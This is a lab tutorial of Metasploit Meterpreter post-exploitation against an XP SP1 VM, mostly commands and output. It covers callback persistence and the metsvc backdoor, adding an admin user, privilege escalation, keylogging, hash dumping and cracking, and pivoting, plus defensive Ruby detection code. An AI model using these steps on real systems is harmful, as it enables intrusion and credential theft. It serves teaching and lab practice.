The previous post used BeEF and Metasploit to get a meterpreter session on an XP SP1 box.
This post goes further and uses Meterpreter to work over that poor XP machine.
The post is long, so use the table of contents.
=========================================
How a traditional shell payload works: (1) the payload opens a port, call it A, on the victim; (2) a command interpreter is bound to A; (3) the attacker connects to A and is talking to the victim's machine.

Why that is bad: (1) it creates a new process, which is easy to spot; (2) attacker and victim send each other data over that port, which an IDS can detect; (3) the victim process may be running in a chroot (changed root directory), which limits what the shell can do.

Meterpreter instead: (1) is purely in memory, with every API it needs reached through hooks; (2) XORs the stream in 16-byte groups and wraps it in SSL for transport. In short it is hard to spot, works across platforms and is extensible. One caveat worth keeping in mind: the XOR step only obscures bytes, and the key travels with the stager, so it is the SSL wrapper, not the XOR, that keeps the traffic confidential.
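To make that caveat concrete, here is an added example (my code, not code from the original post or from Metasploit) of a repeating-key XOR over 16-byte groups, the kind of transport obfuscation just described. It shows why a plaintext byte signature for the stage stops matching on the wire, and why this is not encryption: the key is known to the stager, so whoever holds the stager reverses it, and a key with zero bytes leaks plaintext outright. The stage bytes, the keys and the signature are constructed for the example.

```ruby
# Added example, not code from the original post or from Metasploit:
# repeating-key XOR over 16-byte groups, as transport obfuscation.
KEY_LEN = 16

# XOR each byte of `stage` with the key byte at the same offset within its
# 16-byte group. XOR is its own inverse, so the same call decodes.
def xor_stage(stage, key)
  raise ArgumentError, "key must be #{KEY_LEN} bytes" unless key.bytesize == KEY_LEN
  stage.each_byte.with_index.map { |b, i| b ^ key.getbyte(i % KEY_LEN) }.pack("C*")
end

# Offsets where a zero key byte lets plaintext through unchanged: a weak key
# leaks fragments of the stage even though it is "encoded".
def leaked_offsets(stage, key)
  encoded = xor_stage(stage, key)
  (0...stage.bytesize).select { |i| encoded.getbyte(i) == stage.getbyte(i) }
end

def signature_hit?(blob, sig)
  !blob.index(sig).nil?
end

# Constructed stand-in for the stage: filler around a recognisable string that
# a naive IDS rule might key on.
SAMPLE_STAGE = ([0x90] * 7 + "metsrv.dll\0".bytes + [0xCC] * 9).pack("C*")
SIGNATURE    = "metsrv.dll".b
GOOD_KEY     = (1..KEY_LEN).map { |i| (i * 7) & 0xff }.pack("C*")   # no zero bytes
WEAK_KEY     = ([0] * 8 + (1..8).map { |i| i * 31 }).pack("C*")      # half the key is zero

def demo(key = GOOD_KEY)
  wire = xor_stage(SAMPLE_STAGE, key)
  {
    plaintext_hit: signature_hit?(SAMPLE_STAGE, SIGNATURE),
    wire_hit:      signature_hit?(wire, SIGNATURE),
    recovered:     xor_stage(wire, key) == SAMPLE_STAGE,
    leaked:        leaked_offsets(SAMPLE_STAGE, key).size,
  }
end

if $PROGRAM_NAME == __FILE__
  p demo(GOOD_KEY)   # signature gone on the wire, fully recoverable with the key
  p demo(WEAK_KEY)   # still no signature hit, but 16 of 27 bytes pass through in clear
end
```

The good key defeats the signature match and the weak key still does, which is exactly the point: signature misses say nothing about confidentiality. Anyone with the key, or with the stager that carries it, gets the stage back byte for byte.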
Session basics:
background # put meterpreter in the background
sessions -i index # interact with a session; index is the session number (1 for the first one)
quit # leave the session
shell # get a command prompt on the target
irb # open a ruby shell

File system:
cat c:\\boot.ini # show a file
getwd # print the working directory
upload /root/Desktop/netcat.exe c:\\ # upload a file to the target
download nimeia.txt /root/Desktop/ # download a file to the attacker's box
edit c:\\boot.ini # edit a file
search -d c:\\windows -f *.mdb # search for files

Network:
ipconfig / ifconfig # network interfaces
portfwd add -l 5555 -p 3389 -r 192.168.198.129 # port forward: listen on local 5555, send to 3389 on the remote host
root@bt:~# rdesktop -u Administrator -p 123qwe 127.0.0.1:5555
route # routing table

Processes:
ps # list running processes
migrate pid # move the Meterpreter session into the process with that pid
execute -H -i -f cmd.exe # start cmd.exe; -H hidden, -i interactive
getpid # pid of the process Meterpreter lives in
kill pid # kill a process
getuid # user the session runs as
sysinfo # target system info: hostname, OS, etc.
shutdown # shut the target down
Metasploit module types: auxiliary (AUX) modules for information gathering; exploit modules for the attack itself; post-exploitation modules for host control and follow-on attacks. Together they cover the whole penetration test.

Is it a VM?

meterpreter > run post/windows/gather/checkvm
[*] Checking if EMASTER-8G5WOLV is a Virtual Machine .....
[*] This is a VMware Virtual Machine

If it is a VM, enthusiasm drops. It may well be a honeypot.
Persistence, option 1: the persistence script.

meterpreter > run persistence -X -i 5 -p 443 -r 192.168.0.108
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/EMASTER-8G5WOLV_20131206.5032/EMASTER-8G5WOLV_20131206.5032.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=443
[*] Persistent agent script is 609628 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs
[*] Executing script C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs
[+] Agent executed with PID 1888
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp

-X means start at boot, -i 5 retries the connection every 5 seconds, -p and -r are the port and host the agent calls back to. It drops a vbs file under C:\WINDOWS\TEMP on the target and registers it in the HKLM Run key, so the agent is started at every boot. The vbs file really is there and so is the autorun entry, but:

Two things a tester should not forget: the agent authenticates nothing, so whoever listens on 192.168.0.108:443 gets the session; and the cleanup resource file printed on the second line is how you undo this, by running resource /root/.msf4/logs/persistence/EMASTER-8G5WOLV_20131206.5032/EMASTER-8G5WOLV_20131206.5032.rc from msfconsole while a session to the host is open.

Persistence, option 2: metsvc.

meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JszPreYrwkWEm...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
 * Installing service metsvc
 * Starting service
Service metsvc successfully installed.
meterpreter >

It listens on 31337, uploads three files (one DLL and two EXEs: metsrv.dll, metsvc-server.exe and metsvc.exe, not three DLLs) and the target now has an extra service, metsvc, that starts automatically. metsvc does no authentication at all: anyone who can reach port 31337 gets a SYSTEM Meterpreter, so leaving it behind is leaving a backdoor open to the whole network. Remove it with run metsvc -r.

Reconnecting later uses a handler with the metsvc bind payload:

msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf exploit(handler) > set RHOST 192.168.0.111
RHOST => 192.168.0.111
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit
[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.0.108:39406 -> 192.168.0.111:31337) at 2013-12-06 14:24:29 +0800
meterpreter >
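From the defender's side, the Run-key entry the persistence script installed above is the thing to look for. The following is an added example (my code, not code from the original post or from Metasploit) of a triage check over the text that reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run prints: it flags entries with a script payload, a file under a TEMP directory, or a random-looking value name like tTCmdZkXLp. The registry dump, the value data for the vbs entry and the thresholds are constructed assumptions for the example, not what the real script writes byte for byte.

```ruby
# Added example, not code from the original post or from Metasploit:
# heuristics over `reg query ...\CurrentVersion\Run` output.

# Constructed dump; the second entry mimics the one the persistence script left.
RUN_KEY_DUMP = <<~REG
  HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
      VMware Tools    REG_SZ    "C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe"
      tTCmdZkXLp    REG_SZ    C:\\WINDOWS\\TEMP\\lOFkqsGGtNr.vbs
      ctfmon.exe    REG_SZ    C:\\WINDOWS\\system32\\ctfmon.exe
REG

# One value line: name, type and data separated by runs of two or more spaces.
ENTRY_RE  = /\A\s+(?<name>\S.*?)\s{2,}(?<type>REG_\w+)\s{2,}(?<data>.*)\z/
SCRIPT_RE = /\.(vbs|vbe|js|jse|wsf|hta|bat|cmd|ps1)\b|\b(wscript|cscript|mshta|powershell)\b/i
TEMP_RE   = /\\temp\\|%temp%|%tmp%/i

# A generated value name flips case far more often than a product name does.
# Heuristic: at least 8 letters, no spaces, case flips on half the letter pairs.
def random_looking?(name)
  return false if name.include?(" ") || name.length < 8
  letters = name.chars.select { |c| c =~ /[A-Za-z]/ }
  return false if letters.size < 8
  flips = letters.each_cons(2).count { |a, b| (a =~ /[A-Z]/).nil? != (b =~ /[A-Z]/).nil? }
  flips.to_f / (letters.size - 1) >= 0.5
end

def parse_run_key(dump)
  dump.each_line.map { |line| ENTRY_RE.match(line.chomp) }.compact.map do |m|
    { name: m[:name], type: m[:type], data: m[:data] }
  end
end

def reasons_for(entry)
  reasons = []
  reasons << :script_payload if entry[:data] =~ SCRIPT_RE
  reasons << :temp_path      if entry[:data] =~ TEMP_RE
  reasons << :random_name    if random_looking?(entry[:name])
  reasons
end

# Only the entries that tripped at least one heuristic, with the reasons.
def suspicious_run_entries(dump)
  parse_run_key(dump).map { |e| e.merge(reasons: reasons_for(e)) }
                     .reject { |e| e[:reasons].empty? }
end

if $PROGRAM_NAME == __FILE__
  suspicious_run_entries(RUN_KEY_DUMP).each do |e|
    puts "#{e[:name].ljust(16)} #{e[:data]}  <- #{e[:reasons].join(', ')}"
  end
end
```

The same three checks apply to the other autorun locations (HKCU Run, RunOnce, the Startup folders); only the regex for the dump format changes. The name heuristic is deliberately loose and tuned to short samples, so treat a :random_name hit on its own as a prompt to look, not as a verdict.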
Adding a remote desktop user:

meterpreter > run getgui -u aa -p 123qwe

If nothing went wrong, that added the user aa with password 123qwe and put it into the two groups the script manages, Administrators and Remote Desktop Users, with Remote Desktop enabled. Then:

msf exploit(handler) > rdesktop -u aa -p 123qwe 192.168.0.111:3389

Connected. If the target sits on an internal network you can only reach through the session, set up a port forward first:

portfwd add -l 5555 -p 3389 -r 192.168.0.111 # listen on local 5555, forward to 3389 on the target
root@bt:~# rdesktop -u Administrator -p 123qwe 127.0.0.1:5555
Privilege escalation with getsystem:

meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
 -h Help Banner.
 -t <opt> The technique to use. (Default to '0').
 0 : All techniques available
 1 : Service - Named Pipe Impersonation (In Memory/Admin)
 2 : Service - Named Pipe Impersonation (Dropper/Admin)
 3 : Service - Token Duplication (In Memory/Admin)
 4 : Exploit - KiTrap0D (In Memory/User)
meterpreter >

getsystem tries the four techniques in turn; the part in brackets says how the technique runs (in memory or with a dropped file) and the privilege it needs to start from. The three service-based techniques need an administrator token already, so from a plain user session only technique 4 (the KiTrap0D kernel bug, MS10-015) applies, and only where that patch is missing.

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

SYSTEM is as high as it goes on a single host.
Escalation post modules, tried from the msf prompt against the backgrounded session:

meterpreter > background
[*] Backgrounding session 5...
msf > set session 5
session => 5
msf > use post/windows/escalate/ms10_073_kbdlayout
msf post(ms10_073_kbdlayout) > exploit
[*] Attempting to elevate PID 0x278
[*] {"GetLastError"=>0, "return"=>1548}
[*] Wrote malicious keyboard layout to C:\WINDOWS\TEMP\p0wns.boom ..
[*] Allocated 0x8000 bytes of memory @ 0x60630000
[*] Initialized RWX buffer ...
[*] Current Keyboard Layout: 0x8040804
[*] Patched in syscall wrapper @ 0x60631000
[*] Successfully executed syscall wrapper!
[*] Attempting to cause the ring0 payload to execute...
[*] SendInput: {"GetLastError"=>5, "return"=>1}
[*] Post module execution completed
msf post(ms10_073_kbdlayout) >

The last SendInput line reports GetLastError 5 (ERROR_ACCESS_DENIED) and the module says nothing about the resulting privilege level, so check with getuid before assuming the escalation worked.

msf post(ms10_073_kbdlayout) > back
msf > set session 5
session => 5
msf > use post/windows/escalate/ms10_092_schelevator
msf post(ms10_092_schelevator) > exploit
[-] Windows XP (Build 2600, Service Pack 1). is not vulnerable.
[*] Post module execution completed
msf post(ms10_092_schelevator) >

Sigh, shamefully I can only pick on XP SP1. Not much to boast about.
Recently used files (dumplinks parses the .lnk files in each user's Recent folder):

meterpreter > run post/windows/gather/dumplinks
[*] Running module against EMASTER-8G5WOLV
[*] Running as SYSTEM extracting user list...
[*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
[*] Processing: C:\Documents and Settings\Administrator\Recent\1.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\KaEbvZfANVE.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\lOFkqsGGtNr.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\nimeia.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\pvTdNq.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Temp.lnk.
[*] No Recent Office files found for user Administrator. Nothing to do.
[*] No Recent directory found for user LocalService. Nothing to do.
[*] No Recent Office files found for user LocalService. Nothing to do.
[*] No Recent directory found for user NetworkService. Nothing to do.
[*] No Recent Office files found for user NetworkService. Nothing to do.

Note that our own persistence script (lOFkqsGGtNr.lnk) already shows up in the Administrator's Recent list; the trail a tester leaves is visible from the same place.

Keylogging:

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
dir <Return> cd <Ctrl> <LCtrl> zhuomian1 <Back> <Back> <Back> <Back> 11 <Back> <Back> zhuo <Return> =-1 <Tab> <Return> <CapsLock> dir <Return> <Back> <Back> <Back> <Back> <Ctrl> <LCtrl> dir <CapsLock> <Back> <Back> r <Back> ir <Return>
meterpreter > keyscan_dump
Dumping captured keystrokes...
<Return> <Return> <N5> <N6> <N4> <N5> <N4> <N5> <N9> <N1> <N3> xugyabq <Back> <Back> ihuanqiiq <Return> http://blog.csdn.net/xihuanqiqi <Ctrl> <LCtrl> s <Back> <Back> <Back> <Back> emaster <Left> -- <Back> <Back> _ <Ctrl> <LCtrl> s
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter >

keyscan only sees keystrokes delivered to the process Meterpreter is running in, so migrate into explorer.exe first to capture what the logged-on user types, or into winlogon.exe to capture logon passwords.
Installed software:

meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on EMASTER-8G5WOLV
Installed Applications
======================
Name                              Version
----                              -------
Adobe Flash Player 11 ActiveX     11.9.900.152
VMware Tools                      8.1.4.11056
WebFldrs XP                       9.50.6513
Windows Installer 3.1 (KB893803)  3.1
[*] Results stored in: /root/.msf4/loot/20131206164307_default_192.168.0.111_host.application_476551.txt
meterpreter >

Packet capture on the target (the capture buffer lives in the target's memory and is pulled back as a pcap):

meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > sniffer_interfaces
1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
meterpreter > sniffer_interfaces 1
1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
meterpreter > sniffer_start 1
[*] Capture started on interface 1 (50000 packet buffer)
meterpreter > sniffer_dump 1 /tmp/xpsp1.cap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 355 packets (101378 bytes)
[*] Downloaded 100% (101378/101378)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /tmp/xpsp1.cap
meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
[*] There are 157 packets (40891 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
meterpreter >

Internet Explorer data:

meterpreter > run post/windows/gather/enum_ie
[*] IE Version: 6.0.2800.1106
[-] This module will only extract credentials for >= IE7
[*] Retrieving history.....
File: C:\Documents and Settings\LocalService\Local Settings\History\History.IE5\index.dat
[*] Retrieving cookies.....
File: C:\Documents and Settings\LocalService\Cookies\index.dat
[*] Looping through history to find autocomplete data....
[-] No autocomplete entries found in registry
[*] Looking in the Credential Store for HTTP Authentication Creds...
meterpreter >

Credentials are only extracted from IE7 and up; on this IE6 box it still pulls history and cookies.
Before cracking, the framework needs its database. The installer's settings:

msf auxiliary(jtr_crack_fast) > cat /opt/metasploit/config/database.yml
[*] exec: cat /opt/metasploit/config/database.yml
#
# These settings are for the database used by the Metasploit Framework
# unstable tree included in this installer, not the commercial editions.
#
development:
  adapter: "postgresql"
  database: "msf3dev"
  username: "msf3"
  password: "4bfedfc2"
  port: 7337
  host: "localhost"
  pool: 256
  timeout: 5
production:
  adapter: "postgresql"
  database: "msf3dev"
  username: "msf3"
  password: "4bfedfc2"
  port: 7337
  host: "localhost"
  pool: 256
  timeout: 5
msf auxiliary(jtr_crack_fast) > db_connect msf3:4bfedfc2@localhost:7337/msf3dev

The connection string format is db_connect username:password@localhost:port/database; every value comes from /opt/metasploit/config/database.yml. That file holds the database password in the clear, and the database holds every hash and credential the framework has collected, so its permissions matter as much as the loot files do.

If msfconsole cannot find the database gems, point it at the bundled Ruby:

vi /opt/metasploit/msf3/msfconsole
change #!/usr/bin/env ruby to #!/opt/metasploit/ruby/bin/ruby at the top of msfconsole.

For why this change is needed, see the troubleshooting write-up linked from the original post.
Dumping password hashes, first as a post module against a backgrounded session:

msf exploit(handler) > use post/windows/gather/hashdump
msf post(hashdump) > set session 1
session => 1
msf post(hashdump) > exploit
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 69f8b1cc8404c6c59864966365d3a7b8...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::
[*] Post module execution completed

Then with the hashdump command straight from meterpreter:

meterpreter > hashdump
Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::
meterpreter >

hashdump's limits: it does nothing without SYSTEM privileges; it is unstable on Win7, Vista and Win2008; it fails under UAC (User Account Control).

smart_hashdump works around those:

meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against EMASTER-8G5WOLV
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20131207144502_default_192.168.0.111_windows.hashes_582943.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 69f8b1cc8404c6c59864966365d3a7b8...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
[+] Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
[+] HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb:::
[+] SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::
meterpreter >

Note that it left out the Guest line, whose LM and NT values are both the empty-password hashes. smart_hashdump's logic:
- check the current privilege level and the OS type
- check whether the host is a domain controller
- read the hashes from the registry; if that fails, inject into the LSASS process; on a domain controller, inject into LSASS directly
- on Win2008 with an administrator session, try getsystem; if LSASS cannot be injected from SYSTEM, migrate into a process already running as SYSTEM first, then inject
- on Win7/Vista with UAC off and an administrator session, try getsystem and read the hashes
- on Win2003/XP/2000, getsystem and read the hashes directly
With the database connected, everything dumped so far is in the creds table:

msf auxiliary(jtr_crack_fast) > creds
Credentials
===========
host           port  user              pass                                                               type      active?
----           ----  ----              ----                                                               ----      -------
192.168.0.111  445   guest             aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0                  smb_hash  true
192.168.0.111  445   administrator     123qwe                                                             password  true
192.168.0.111  445   guest                                                                                password  true
192.168.0.111  445   administrator     daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011  smb_hash  true
192.168.0.111  445   helpassistant     866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb  smb_hash  true
192.168.0.111  445   support_388945a0  aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881  smb_hash  true
[*] Found 6 credentials.
msf auxiliary(jtr_crack_fast) >

Cracking with the bundled John the Ripper. The same pair of libssl/libcrypto "no version information available" warnings is printed before every john run; it is shown once below and omitted after that.

msf post(hashdump) > use auxiliary/analyze/jtr_crack_fast
msf auxiliary(jtr_crack_fast) > exploit
[*] Seeded the password database with 6 words...
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
/opt/metasploit/msf3/data/john/run.linux.x86.sse2/john: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /opt/metasploit/msf3/data/john/run.linux.x86.sse2/john)
guesses: 1 time: 0:00:00:06 DONE (Sat Dec 7 14:36:28 2013) c/s: 5791K trying: WIT1900 - ZZZ1900
Warning: passwords printed above might be partial and not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 4 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: 123QWE (cred_1)
Warning: mixed-case charset, but the current hash type is case-insensitive; some candidate passwords may be unnecessarily tried more than once.
guesses: 1 time: 0:00:00:08 DONE (Sat Dec 7 14:36:37 2013) c/s: 18967K trying: ||V} - |||}
Warning: passwords printed above might be partial and not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 4 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 3 password hashes with no different salts
[*] Output: (cred_2)
guesses: 0 time: 0:00:00:00 DONE (Sat Dec 7 14:36:37 2013) c/s: 1234K trying: 89093 - 89092
[*] Output: Loaded 4 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 2 password hashes with no different salts
[*] cred_1:123QWE:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
[*] cred_2::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] cred_4::aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::
[*]
[*] 3 password hashes cracked, 2 left
guesses: 1 time: 0:00:00:20 DONE (Sat Dec 7 14:36:58 2013) c/s: 10089K trying: zydeco1900 - 123qwe1900
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: 123qwe (cred_1)
guesses: 1 time: 0:00:00:09 DONE (Sat Dec 7 14:37:07 2013) c/s: 17311K trying: |||}
Use the "--show" option to display all of the cracked passwords reliably
[*] Output: Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 3 password hashes with no different salts
[*] Output: (cred_2)
guesses: 0 time: 0:00:00:00 DONE (Sat Dec 7 14:37:08 2013) c/s: 1388K trying: 89030 - 89092
[*] Output: Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 2 password hashes with no different salts
[*] cred_1:123qwe:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
[*] cred_2::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*]
[*] 2 password hashes cracked, 2 left
[+] Cracked: administrator:123qwe (192.168.0.111:445)
[+] Cracked: guest: (192.168.0.111:445)
[*] Auxiliary module execution completed
msf auxiliary(jtr_crack_fast) >

Reading the two passes: the LM pass gives 123QWE because LM uppercases the password and splits it into two 7-character halves before hashing, so it cannot know the case; the NT pass then gives the real 123qwe. The LM pass also "cracks" cred_2 (guest) and cred_4 (SUPPORT_388945a0) as empty, but only guest really is: a blank LM hash means either an empty password or one longer than 14 characters (or LM storage switched off), and SUPPORT_388945a0's NT hash is not the empty-password value, which is why the NT pass leaves it uncracked.
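What john reproduced above can be checked by hand, and the LM field tells you things before any cracking starts. The following is an added example (my code, not code from the original post or from Metasploit): a pure-Ruby MD4 (so NT hashes can be computed without OpenSSL's legacy provider), a parser for the pwdump-style lines hashdump prints, and a candidate check. It serves both the hashdump section and the john run above. The hash lines are the ones dumped from the XP box; the candidate passwords tried against them are assumptions.

```ruby
# Added example, not code from the original post or from Metasploit:
# NT hash computation plus what the LM field gives away before cracking.

module MD4
  MASK = 0xffffffff
  K2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15].freeze
  K3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15].freeze

  def self.rotl(x, s)
    ((x << s) | (x >> (32 - s))) & MASK
  end

  # RFC 1320: pad to 56 mod 64, append the bit length, three 16-step rounds per block.
  def self.hexdigest(msg)
    data = msg.b
    bits = data.bytesize * 8
    data += "\x80".b
    data += "\x00".b * ((56 - data.bytesize % 64) % 64)
    data += [bits & MASK, bits >> 32].pack("V2")
    state = [0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476]
    data.unpack("V*").each_slice(16) do |x|
      s = state.dup
      step = lambda do |i, k, fn, const, shifts|
        slot = [0, 3, 2, 1][i % 4]                       # a, d, c, b are updated in turn
        b, c, d = s[(slot + 1) % 4], s[(slot + 2) % 4], s[(slot + 3) % 4]
        s[slot] = rotl((s[slot] + fn.call(b, c, d) + x[k] + const) & MASK, shifts[i % 4])
      end
      16.times           { |i|    step.call(i, i, ->(b, c, d) { (b & c) | (~b & d & MASK) }, 0,          [3, 7, 11, 19]) }
      K2.each_with_index { |k, i| step.call(i, k, ->(b, c, d) { (b & c) | (b & d) | (c & d) }, 0x5a827999, [3, 5, 9, 13]) }
      K3.each_with_index { |k, i| step.call(i, k, ->(b, c, d) { b ^ c ^ d },                   0x6ed9eba1, [3, 9, 11, 15]) }
      state = state.zip(s).map { |u, v| (u + v) & MASK }
    end
    state.pack("V4").unpack1("H*")
  end
end

# NT hash = MD4 over the UTF-16LE password. No salt, so the same password gives
# the same hash on every machine, which is what makes pass-the-hash work.
def nt_hash(password)
  MD4.hexdigest(password.encode("UTF-16LE"))
end

LM_BLANK_HALF = "aad3b435b51404ee"                   # LM half for an empty 7-char chunk
NT_BLANK      = "31d6cfe0d16ae931b73c59d7e0c089c0"   # MD4 of the empty string

# The lines hashdump printed for the XP box.
SAMPLE_DUMP = <<~DUMP
  Administrator:500:daa141f3639de015aad3b435b51404ee:ad70819c5bc807280974d80f45982011:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:866b0a48f9bc08d1299a6d3c130ee922:a73c00a673fd19e25e49604cd86288fb:::
  SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1510034a446ea318032bab987c599881:::
DUMP

# user:rid:lm:nt::: -> one hash per account, with what the LM halves reveal:
# both halves blank  -> empty password, >14 chars, or LM storage disabled
# second half blank  -> password is at most 7 characters (one LM half to crack)
def parse_pwdump(text)
  text.each_line.map do |line|
    user, rid, lm, nt = line.strip.split(":")
    next unless nt && nt.size == 32 && lm && lm.size == 32
    first, second = lm[0, 16], lm[16, 16]
    {
      user: user, rid: rid.to_i, lm: lm, nt: nt,
      nt_blank: nt == NT_BLANK,
      lm_stored: !(first == LM_BLANK_HALF && second == LM_BLANK_HALF),
      lm_at_most_7: first != LM_BLANK_HALF && second == LM_BLANK_HALF,
    }
  end.compact
end

def password_matches?(entry, candidate)
  nt_hash(candidate) == entry[:nt]
end

if $PROGRAM_NAME == __FILE__
  parse_pwdump(SAMPLE_DUMP).each do |e|
    puts "#{e[:user]}: lm_stored=#{e[:lm_stored]} at_most_7=#{e[:lm_at_most_7]} " \
         "nt_blank=#{e[:nt_blank]} 123qwe?=#{password_matches?(e, '123qwe')}"
  end
end
```

For the Administrator line the second LM half is the blank value, so before john ran at all the password was known to be at most 7 characters, and a single 7-character LM half is a small DES keyspace. HelpAssistant has two non-blank halves (8 to 14 characters), and SUPPORT_388945a0 has no LM hash but a non-empty NT hash, so it is the one account here that cannot be reached through LM.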
Pivoting: route the target's subnet through the session.

meterpreter > run get_local_subnets
Local subnet: 192.168.0.0/255.255.255.0
meterpreter > background
[*] Backgrounding session 1...
msf auxiliary(jtr_crack_fast) > route add 192.168.0.0 255.255.255.0 1
[*] Route added
msf auxiliary(jtr_crack_fast) > route print
Active Routing Table
====================
Subnet        Netmask        Gateway
------        -------        -------
192.168.0.0   255.255.255.0  Session 1
msf auxiliary(jtr_crack_fast) >

msf has now added a route for 192.168.0.0/24 through session 1, so all traffic from Metasploit modules to that subnet goes through the session. Two things to keep in mind: this route only applies to Metasploit's own modules, not to tools run outside msfconsole (those still need portfwd or a socks proxy), and in this lab the attacker (192.168.0.108) already sits on that same /24, so the route is a demonstration of the mechanism rather than a necessity.

msf auxiliary(jtr_crack_fast) > set RHOSTS 192.168.0.0/24
RHOST => 192.168.0.0/24
msf auxiliary(jtr_crack_fast) > set PORTS 445
PORTS => 445
msf auxiliary(jtr_crack_fast) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > run

